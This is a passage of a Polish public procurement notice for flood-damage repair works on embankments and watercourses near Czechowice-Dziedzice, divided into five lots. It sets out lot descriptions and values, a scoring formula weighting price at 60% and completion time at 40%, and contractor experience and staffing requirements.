kryterium określonym <br/>w pkt 15.2.2 SWZ poprzez przyznanie punktów za zaoferowany termin wykonania w następujący sposób:<br/><br/>Dla części nr 1:<br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1	Termin wykonania : do 30 dni 40<br/>2	Termin wykonania: do 35 dni 20<br/>3	Termin wykonania: do 40 dni 0<br/><br/>W przypadku, gdy Wykonawca nie wskaże w Formularzu oferty terminu wykonania Zamawiający przyjmie do oceny termin wykonania wynoszący <br/>40 dni i przyzna 0,00 pkt w niniejszym kryterium.<br/><br/>Dla części nr 2:<br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1	Termin wykonania: do 20 dni 40<br/>2 Termin wykonania: do 25 dni 20<br/>3 Termin wykonania: do 30 dni 0<br/><br/>W przypadku, gdy Wykonawca nie wskaże w Formularzu oferty terminu wykonania Zamawiający przyjmie do oceny termin wykonania wynoszący <br/>30 dni i przyzna 0,00 pkt w niniejszym kryterium.<br/><br/>Dla części nr 3:<br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1 Termin wykonania: do 150 dni 40<br/>2 Termin wykonania: do 155 dni 20<br/>3 Termin wykonania: do 160 dni 0<br/><br/>W przypadku, gdy Wykonawca nie wskaże w Formularzu oferty terminu wykonania Zamawiający przyjmie do oceny termin wykonania wynoszący <br/>160 dni i przyzna 0,00 pkt w niniejszym kryterium.<br/><br/>Dla części nr 4:<br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1 Termin wykonania: do 100 dni 40<br/>2 Termin wykonania: do 105 dni 20<br/>3 Termin wykonania: do 110 dni 0<br/><br/>W przypadku, gdy Wykonawca nie wskaże w Formularzu oferty terminu wykonania Zamawiający przyjmie do oceny termin wykonania wynoszący <br/>110 dni i przyzna 0,00 pkt w niniejszym kryterium.<br/><br/>Dla części nr 5:<br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1 Termin wykonania: do 150 dni 40<br/>2 Termin wykonania: do 155 dni 20<br/>3 Termin wykonania: do 160 dni 0<br/><br/>W przypadku, gdy Wykonawca nie wskaże w Formularzu oferty terminu wykonania Zamawiający przyjmie do oceny termin wykonania wynoszący <br/>160 dni i przyzna 0,00 pkt w niniejszym kryterium.<br/><br/>15.5.	Zamawiający wybierze ofertę najkorzystniejszą na podstawie kryteriów oceny ofert określonych w SWZ. Za najkorzystniejszą zostanie uznana oferta, która łącznie (suma punktów przyznanych we wszystkich kryteriach oceny ofert) uzyska największą liczbę punktów obliczonych zgodnie z wzorem określonym w pkt 15.3 SWZ. <br/>15.6.	Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 3 - Realizacja prac na wałach przeciwpowodziowych, skarpach i w korycie – ciek Jasienicki.<br/><br/>Przedmiotem zamówienia jest likwidacja wyrw w skarpach odwodnych wałów przeciwpowodziowych cieku Jasienickiego w Ligocie, naprawa ubezpieczeń i likwidacja wyrw brzegowo-dennych cieku Jasienicki w rej. ul. Św. Floriana, Zagrodowej, Wierzbowej i Sportowej oraz Rzecznej w Międzyrzeczu Dolnym i Górnym oraz roboty w rej. ul. Jazowej w Międzyrzeczu Górnym - w formule „zaprojektuj i wybuduj. Zamówienie obejmuje opracowanie uproszczonej dokumentacji projektowej i wykonanie na jej podstawie robót budowlanych </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 3600386,57 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45246400-7 - Roboty w zakresie ochrony przeciwpowodziowej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">160 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">15.1.	Ocenie będą podlegały oferty ważne tj. oferty niepodlegające odrzuceniu.<br/>15.2.	Oferty oceniane będą na podstawie następujących kryteriów:<br/>15.2.1.	cena brutto – waga 60%<br/>15.2.2.	termin wykonania – waga 40%<br/>15.3.	Ocena ofert zostanie dokonana wg poniższego wzoru:<br/>P = Pc + Pt<br/>gdzie: <br/>P – łączna liczba punktów przyznanych badanej ofercie, <br/>Pc – liczba punktów w kryterium „cena brutto”,<br/>Pt – liczba punktów w kryterium „termin wykonania”.<br/>15.4.	Ocena w poszczególnych kryteriach dokonywana będzie na poniższych zasadach:<br/>15.4.1.	Każda z ważnych ofert będzie punktowana w kryterium określonym <br/>w pkt 15.2.1 SWZ poprzez porównanie ceny brutto oferty badanej do ceny brutto najniższej ze wszystkich ważnych ofert, wg poniższego wzoru:<br/>Pc = (Cn : Cb) x 60<br/>gdzie: <br/>Cn – cena brutto najniższa spośród wszystkich ofert podlegających ocenie,<br/>Cb – cena brutto oferty badanej.<br/>15.4.2.	Każda z ważnych ofert będzie punktowana w kryterium określonym <br/>w pkt 15.2.2 SWZ poprzez przyznanie punktów za zaoferowany termin wykonania w następujący sposób:<br/><br/>Dla części nr 1:<br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1	Termin wykonania : do 30 dni 40<br/>2	Termin wykonania: do 35 dni 20<br/>3	Termin wykonania: do 40 dni 0<br/><br/>W przypadku, gdy Wykonawca nie wskaże w Formularzu oferty terminu wykonania Zamawiający przyjmie do oceny termin wykonania wynoszący <br/>40 dni i przyzna 0,00 pkt w niniejszym kryterium.<br/><br/>Dla części nr 2:<br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1	Termin wykonania: do 20 dni 40<br/>2 Termin wykonania: do 25 dni 20<br/>3 Termin wykonania: do 30 dni 0<br/><br/>W przypadku, gdy Wykonawca nie wskaże w Formularzu oferty terminu wykonania Zamawiający przyjmie do oceny termin wykonania wynoszący <br/>30 dni i przyzna 0,00 pkt w niniejszym kryterium.<br/><br/>Dla części nr 3:<br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1 Termin wykonania: do 150 dni 40<br/>2 Termin wykonania: do 155 dni 20<br/>3 Termin wykonania: do 160 dni 0<br/><br/>W przypadku, gdy Wykonawca nie wskaże w Formularzu oferty terminu wykonania Zamawiający przyjmie do oceny termin wykonania wynoszący <br/>160 dni i przyzna 0,00 pkt w niniejszym kryterium.<br/><br/>Dla części nr 4:<br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1 Termin wykonania: do 100 dni 40<br/>2 Termin wykonania: do 105 dni 20<br/>3 Termin wykonania: do 110 dni 0<br/><br/>W przypadku, gdy Wykonawca nie wskaże w Formularzu oferty terminu wykonania Zamawiający przyjmie do oceny termin wykonania wynoszący <br/>110 dni i przyzna 0,00 pkt w niniejszym kryterium.<br/><br/>Dla części nr 5:<br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1 Termin wykonania: do 150 dni 40<br/>2 Termin wykonania: do 155 dni 20<br/>3 Termin wykonania: do 160 dni 0<br/><br/>W przypadku, gdy Wykonawca nie wskaże w Formularzu oferty terminu wykonania Zamawiający przyjmie do oceny termin wykonania wynoszący <br/>160 dni i przyzna 0,00 pkt w niniejszym kryterium.<br/><br/>15.5.	Zamawiający wybierze ofertę najkorzystniejszą na podstawie kryteriów oceny ofert określonych w SWZ. Za najkorzystniejszą zostanie uznana oferta, która łącznie (suma punktów przyznanych we wszystkich kryteriach oceny ofert) uzyska największą liczbę punktów obliczonych zgodnie z wzorem określonym w pkt 15.3 SWZ. <br/>15.6.	Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 4 - Likwidacja wyrw w skarpach odwodnych wałów przeciwpowodziowych cieku Wapienickiego w miejscowości Ligota gm. Czechowice-Dziedzice (dot. 243).<br/><br/>Planowany zakres robót:<br/>•	pełnienie nadzoru przyrodniczego<br/>•	wykoszenie porostów ze skarp z wygrabieniem<br/>•	częściowa rozbiórka ubezpieczeń z płyt ażurowych, ponowne ułożenie<br/>•	roboty ziemne<br/>•	zakup ziemi<br/>•	wzmocnienie podłoża pod narzut kamienny geowłókniną wzmocnioną 200g/m2<br/>•	zabudowa wyrw narzutem licowanym kamiennym z głazów 50-80cm oraz lokalne wykonanie narzutu kamiennego w dnie wielkości140-350 cm, narzut klinowany mechanicznie<br/>•	lokalna naprawa opasek z kiszek faszynowych<br/>•	naprawa i wykonanie materacy z koszy siatkowo-kamiennych<br/>•	lokalne wykonanie opasek z faszyny między rzędami kołków<br/>•	wykonanie umocnień skarp geokratą układaną na geowłókninie na pospółce, z przymocowaniem kołkami, wypełnionej kamieniem łamanym<br/>•	wykonanie palisady z kołków 10-12 cm<br/>•	obsiew skarp<br/>•	naprawa drogi z nawierzchni tłuczniowej na koronie wału </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 972837,84 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45246400-7 - Roboty w zakresie ochrony przeciwpowodziowej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">110 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">15.1.	Ocenie będą podlegały oferty ważne tj. oferty niepodlegające odrzuceniu.<br/>15.2.	Oferty oceniane będą na podstawie następujących kryteriów:<br/>15.2.1.	cena brutto – waga 60%<br/>15.2.2.	termin wykonania – waga 40%<br/>15.3.	Ocena ofert zostanie dokonana wg poniższego wzoru:<br/>P = Pc + Pt<br/>gdzie: <br/>P – łączna liczba punktów przyznanych badanej ofercie, <br/>Pc – liczba punktów w kryterium „cena brutto”,<br/>Pt – liczba punktów w kryterium „termin wykonania”.<br/>15.4.	Ocena w poszczególnych kryteriach dokonywana będzie na poniższych zasadach:<br/>15.4.1.	Każda z ważnych ofert będzie punktowana w kryterium określonym <br/>w pkt 15.2.1 SWZ poprzez porównanie ceny brutto oferty badanej do ceny brutto najniższej ze wszystkich ważnych ofert, wg poniższego wzoru:<br/>Pc = (Cn : Cb) x 60<br/>gdzie: <br/>Cn – cena brutto najniższa spośród wszystkich ofert podlegających ocenie,<br/>Cb – cena brutto oferty badanej.<br/>15.4.2.	Każda z ważnych ofert będzie punktowana w kryterium określonym <br/>w pkt 15.2.2 SWZ poprzez przyznanie punktów za zaoferowany termin wykonania w następujący sposób:<br/><br/>Dla części nr 1:<br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1	Termin wykonania : do 30 dni 40<br/>2	Termin wykonania: do 35 dni 20<br/>3	Termin wykonania: do 40 dni 0<br/><br/>W przypadku, gdy Wykonawca nie wskaże w Formularzu oferty terminu wykonania Zamawiający przyjmie do oceny termin wykonania wynoszący <br/>40 dni i przyzna 0,00 pkt w niniejszym kryterium.<br/><br/>Dla części nr 2:<br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1	Termin wykonania: do 20 dni 40<br/>2 Termin wykonania: do 25 dni 20<br/>3 Termin wykonania: do 30 dni 0<br/><br/>W przypadku, gdy Wykonawca nie wskaże w Formularzu oferty terminu wykonania Zamawiający przyjmie do oceny termin wykonania wynoszący <br/>30 dni i przyzna 0,00 pkt w niniejszym kryterium.<br/><br/>Dla części nr 3:<br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1 Termin wykonania: do 150 dni 40<br/>2 Termin wykonania: do 155 dni 20<br/>3 Termin wykonania: do 160 dni 0<br/><br/>W przypadku, gdy Wykonawca nie wskaże w Formularzu oferty terminu wykonania Zamawiający przyjmie do oceny termin wykonania wynoszący <br/>160 dni i przyzna 0,00 pkt w niniejszym kryterium.<br/><br/>Dla części nr 4:<br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1 Termin wykonania: do 100 dni 40<br/>2 Termin wykonania: do 105 dni 20<br/>3 Termin wykonania: do 110 dni 0<br/><br/>W przypadku, gdy Wykonawca nie wskaże w Formularzu oferty terminu wykonania Zamawiający przyjmie do oceny termin wykonania wynoszący <br/>110 dni i przyzna 0,00 pkt w niniejszym kryterium.<br/><br/>Dla części nr 5:<br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1 Termin wykonania: do 150 dni 40<br/>2 Termin wykonania: do 155 dni 20<br/>3 Termin wykonania: do 160 dni 0<br/><br/>W przypadku, gdy Wykonawca nie wskaże w Formularzu oferty terminu wykonania Zamawiający przyjmie do oceny termin wykonania wynoszący <br/>160 dni i przyzna 0,00 pkt w niniejszym kryterium.<br/><br/>15.5.	Zamawiający wybierze ofertę najkorzystniejszą na podstawie kryteriów oceny ofert określonych w SWZ. Za najkorzystniejszą zostanie uznana oferta, która łącznie (suma punktów przyznanych we wszystkich kryteriach oceny ofert) uzyska największą liczbę punktów obliczonych zgodnie z wzorem określonym w pkt 15.3 SWZ. <br/>15.6.	Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 5 - Realizacja prac w korycie oraz w obrębie stopnia – rzeka Biała.<br/><br/>Przedmiotem zamówienia jest likwidacja uszkodzeń powstałych w wyniku powodzi we wrześniu 2024r. w korycie rzeki Białej w rejonie ul. Junackiej wzdłuż ul. Rzecznej i Klonowej oraz w obrębie stopnia w km 6+700 w Czechowicach-Dziedzicach i Bestwinie w formule „zaprojektuj i wybuduj”. Zamówienie obejmuje opracowanie uproszczonej dokumentacji projektowej i wykonanie na jej podstawie robót budowlanych </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 2245574,38 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45246400-7 - Roboty w zakresie ochrony przeciwpowodziowej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">160 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">15.1.	Ocenie będą podlegały oferty ważne tj. oferty niepodlegające odrzuceniu.<br/>15.2.	Oferty oceniane będą na podstawie następujących kryteriów:<br/>15.2.1.	cena brutto – waga 60%<br/>15.2.2.	termin wykonania – waga 40%<br/>15.3.	Ocena ofert zostanie dokonana wg poniższego wzoru:<br/>P = Pc + Pt<br/>gdzie: <br/>P – łączna liczba punktów przyznanych badanej ofercie, <br/>Pc – liczba punktów w kryterium „cena brutto”,<br/>Pt – liczba punktów w kryterium „termin wykonania”.<br/>15.4.	Ocena w poszczególnych kryteriach dokonywana będzie na poniższych zasadach:<br/>15.4.1.	Każda z ważnych ofert będzie punktowana w kryterium określonym <br/>w pkt 15.2.1 SWZ poprzez porównanie ceny brutto oferty badanej do ceny brutto najniższej ze wszystkich ważnych ofert, wg poniższego wzoru:<br/>Pc = (Cn : Cb) x 60<br/>gdzie: <br/>Cn – cena brutto najniższa spośród wszystkich ofert podlegających ocenie,<br/>Cb – cena brutto oferty badanej.<br/>15.4.2.	Każda z ważnych ofert będzie punktowana w kryterium określonym <br/>w pkt 15.2.2 SWZ poprzez przyznanie punktów za zaoferowany termin wykonania w następujący sposób:<br/><br/>Dla części nr 1:<br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1	Termin wykonania : do 30 dni 40<br/>2	Termin wykonania: do 35 dni 20<br/>3	Termin wykonania: do 40 dni 0<br/><br/>W przypadku, gdy Wykonawca nie wskaże w Formularzu oferty terminu wykonania Zamawiający przyjmie do oceny termin wykonania wynoszący <br/>40 dni i przyzna 0,00 pkt w niniejszym kryterium.<br/><br/>Dla części nr 2:<br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1	Termin wykonania: do 20 dni 40<br/>2 Termin wykonania: do 25 dni 20<br/>3 Termin wykonania: do 30 dni 0<br/><br/>W przypadku, gdy Wykonawca nie wskaże w Formularzu oferty terminu wykonania Zamawiający przyjmie do oceny termin wykonania wynoszący <br/>30 dni i przyzna 0,00 pkt w niniejszym kryterium.<br/><br/>Dla części nr 3:<br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1 Termin wykonania: do 150 dni 40<br/>2 Termin wykonania: do 155 dni 20<br/>3 Termin wykonania: do 160 dni 0<br/><br/>W przypadku, gdy Wykonawca nie wskaże w Formularzu oferty terminu wykonania Zamawiający przyjmie do oceny termin wykonania wynoszący <br/>160 dni i przyzna 0,00 pkt w niniejszym kryterium.<br/><br/>Dla części nr 4:<br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1 Termin wykonania: do 100 dni 40<br/>2 Termin wykonania: do 105 dni 20<br/>3 Termin wykonania: do 110 dni 0<br/><br/>W przypadku, gdy Wykonawca nie wskaże w Formularzu oferty terminu wykonania Zamawiający przyjmie do oceny termin wykonania wynoszący <br/>110 dni i przyzna 0,00 pkt w niniejszym kryterium.<br/><br/>Dla części nr 5:<br/>L.p.	Elementy podlegające ocenie	Liczba punktów<br/>1 Termin wykonania: do 150 dni 40<br/>2 Termin wykonania: do 155 dni 20<br/>3 Termin wykonania: do 160 dni 0<br/><br/>W przypadku, gdy Wykonawca nie wskaże w Formularzu oferty terminu wykonania Zamawiający przyjmie do oceny termin wykonania wynoszący <br/>160 dni i przyzna 0,00 pkt w niniejszym kryterium.<br/><br/>15.5.	Zamawiający wybierze ofertę najkorzystniejszą na podstawie kryteriów oceny ofert określonych w SWZ. Za najkorzystniejszą zostanie uznana oferta, która łącznie (suma punktów przyznanych we wszystkich kryteriach oceny ofert) uzyska największą liczbę punktów obliczonych zgodnie z wzorem określonym w pkt 15.3 SWZ. <br/>15.6.	Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 7.2.4.1.	Wykonawca musi wykazać, że w okresie ostatnich 7 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał co najmniej: <br/><br/>W zakresie części nr 1 : <br/>W okresie ostatnich 7 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał prace w korytach śródlądowych wód płynących lub obiektach hydrotechnicznych w ramach maksymalnie 2 zadań dla każdego z postawionego warunku:<br/>•	roboty ziemne - w ilości min. 500 m3<br/>•	opaski faszynowe lub z żerdzi drewnianych – w ilości min. 450 m <br/>•	umocnienia z płyt ażurowych – w ilości min. 70 m2<br/><br/>W zakresie części nr 2 : <br/>W okresie ostatnich 7 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał prace w korytach śródlądowych wód płynących lub obiektach hydrotechnicznych w ramach maksymalnie 2 zadań dla każdego z postawionego warunku:<br/>•	roboty ziemne - w ilości min. 200 m3<br/>•	narzut kamienny z kamienia ciężkiego lub średniego - w ilości min. 100 m3<br/><br/>W zakresie części nr 3 : <br/>W okresie ostatnich 7 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał prace w korytach śródlądowych wód płynących lub obiektach hydrotechnicznych w ramach maksymalnie 2 zadań dla każdego z postawionego warunku:<br/>•	roboty ziemne - w ilości min. 5 000 m3<br/>•	narzut kamienny z kamienia ciężkiego lub średniego - w ilości min. 1 000 m3<br/>•	umocnienia z płyt ażurowych – w ilości min. 400 m2<br/>•	budowle siatkowo-kamienne – w ilości min. 450 m3<br/><br/>W zakresie części nr 4 : <br/>W okresie ostatnich 7 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał prace w korytach śródlądowych wód płynących lub obiektach hydrotechnicznych w ramach maksymalnie 2 zadań dla każdego z postawionego warunku:<br/>•	roboty ziemne - w ilości min. 1 500 m3<br/>•	narzut kamienny z kamienia ciężkiego lub średniego - w ilości min. 500 m3<br/>•	umocnienia z płyt ażurowych – w ilości min. 70 m2<br/><br/>W zakresie części nr 5 : <br/>W okresie ostatnich 7 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał prace w korytach śródlądowych wód płynących lub obiektach hydrotechnicznych w ramach maksymalnie 2 zadań dla każdego z postawionego warunku:<br/>•	roboty ziemne - w ilości min. 8 000 m3<br/>•	narzut kamienny z kamienia ciężkiego lub średniego - w ilości min. 1 000 m3<br/>•	robót zbrojeniowych- w ilości min. 300 kg<br/><br/>W celu spełnienia postawionego warunku Wykonawca musi do wykazu załączyć dokumenty potwierdzające, że przedmiotowe roboty zostały wykonane prawidłowo, zgodnie z zasadami sztuki budowlanej.<br/><br/>7.2.4.2.	Wykonawca musi wykazać, że dysponuje osobami zdolnymi do realizacji przedmiotowego zamówienia, posiadającymi odpowiednie doświadczenie oraz kwalifikacje zawodowe umożliwiające realizację zamówienia, w tym :<br/><br/>W zakresie części nr 1 : <br/>•	kierownik budowy / robót: <br/>	- posiadający min. 5-letni staż w kierowaniu robotami budowlanymi <br/>- posiadający uprawnienia budowlane w specjalności inżynieryjnej hydrotechnicznej lub konstrukcyjno – budowlanej do kierowania robotami budowlanymi w zakresie budowli melioracji wodnych lub budowli hydrotechnicznych albo odpowiadające im równoważne uprawnienia wydane na podstawie ówcześnie obowiązujących przepisów prawa <br/>- zrzeszony we właściwej izbie samorządu zawodowego zgodnie z ustawą o samorządach zawodowych architektów oraz inżynierów budownictwa <br/>•	3 osoby pracujące bezpośrednio w terenie <br/><br/>W zakresie części nr 2 : <br/>•	kierownik budowy / robót: <br/>	- posiadający min. 5-letni staż w kierowaniu robotami budowlanymi <br/>- posiadający uprawnienia budowlane w specjalności inżynieryjnej hydrotechnicznej lub konstrukcyjno – budowlanej do kierowania robotami budowlanymi w zakresie budowli melioracji wodnych lub budowli hydrotechnicznych albo odpowiadające im równoważne uprawnienia wydane na podstawie ówcześnie obowiązujących przepisów prawa <br/>- zrzeszony we właściwej izbie samorządu zawodowego zgodnie z ustawą o samorządach zawodowych architektów oraz inżynierów budownictwa <br/>•	3 osoby pracujące bezpośrednio w terenie <br/><br/>W zakresie części nr 3 : <br/>•	Projektant<br/>- z minimum 3-letnim stażem posiadający uprawnienia budowlane do projektowania w specjalności inżynieryjnej hydrotechnicznej, o których mowa w Rozporządzeniu Ministra Inwestycji i Rozwoju z dnia 29.04.2019r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie albo odpowiadające im równoważne uprawnienia w zakresie budowli hydrotechnicznych lub melioracji wodnych wydane na podstawie wcześniej obowiązujących przepisów <br/>- zrzeszony we właściwej terenowo izbie samorządu zawodowego zgodnie z ustawą o samorządach zawodowych architektów oraz inżynierów budownictwa <br/>- będący autorem lub współautorem min. 1 dokumentacji projektowej z zakresu budowy, odbudowy lub remontu budowli hydrotechnicznych / obiektów zabudowy regulacyjnej o wartości min. 70 000,00 zł<br/>•	kierownik budowy / robót: <br/>	- posiadający min. 5-letni staż w kierowaniu robotami budowlanymi <br/>- posiadający uprawnienia budowlane w specjalności inżynieryjnej hydrotechnicznej lub konstrukcyjno – budowlanej do kierowania robotami budowlanymi w zakresie budowli melioracji wodnych lub budowli hydrotechnicznych albo odpowiadające im równoważne uprawnienia wydane na podstawie ówcześnie obowiązujących przepisów prawa <br/>- zrzeszony we właściwej izbie samorządu zawodowego zgodnie z ustawą o samorządach zawodowych architektów oraz inżynierów budownictwa <br/>•	8 osób pracujące bezpośrednio w terenie <br/><br/>W zakresie części nr 4 : <br/>•	kierownik budowy / robót: <br/>	- posiadający min. 5-letni 